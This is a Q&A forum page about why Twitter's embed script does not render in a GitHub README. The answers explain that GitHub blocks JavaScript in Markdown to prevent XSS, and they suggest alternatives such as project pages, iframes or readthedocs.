69

I want to embed a tweet in a GitHub README file. Markdown should support this, however when I add the code that is copied from the tweet the JavaScript doesn't get rendered.

Example:

<blockquote>...</blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>

Any ideas?

Improve this question
2
  • 1
    I'm not sure that you can embed JavaScript in Markdown. Commented Jan 24, 2014 at 19:26
  • You do realize that if I could embed JavaScript into this comment I can go around looking for new questions, help you downvote a couple questions, post a new question for you, change your name or profile picture, and get you banned, right? You think allowing any script on your website is a good idea? You'll more likely embed tweets by asking Github to enable markdown embeds or something. Commented Feb 21, 2022 at 22:55

3 Answers 3

Reset to default
54

Allowing javascript from third parties directly on a website has huge XSS attacks implications. Someone could use javascript code for example to grab the cookies associated to any visitor's github accounts and forward them to a malicious entity.

There's also the nuisance potential, as having access to javascript means having access to the CPU of the visitor and being able to do things like pop-ups or blinking text.

As such it's natural that javascript isn't supported in READMEs. Markdown may have a way of doing it, but it'll never be allowed on a website like GitHub.

However, you can do it on your project's github page, if you have one, since it doesn't belong to the main github website and the domain is not the same.

Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

well if you own the readme then why would you be protecting yourself from making blinking text? With that line of logic we should disable javascript on websites because the owner of the website might "able to do things like pop-ups or blinking text"
JavaScript could also alter GitHub's login form's action such that logging in sends the user's credentials to your own malicious server. However this could be mitigated by forcing js to run inside an iframe as D1plo1d suggested.
they recently allow you to customize your profile home page, so I was trying to load a JavaScript game into it; source
The most you can do is create your own API, put the URL inside the README, and render a GIF, image, or text of your choice inside the README. But everything will be stuck in SandBox, meaning that nothing from the user on the front end can be seen, except for the anonymous presence of the visitor at a certain time, which can be seen on the back end of your API. The advantage is that you can change the README content dynamically without having to edit it.
17

As a follow up to coyotte508's answer (sorry, not enough points to reply directly):

If Github were to enable such a feature they could use iFrames as an effective measure against XSS in the same way ReadTheDocs does.

EDIT: Also you might want to check out readthedocs.org as an alternative to a Github README.md. They support embedding javascript in rst files.

Improve this answer

Comments

1

I came here looking for this:

```js
function myFunction () {
   return true;
}
```
Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.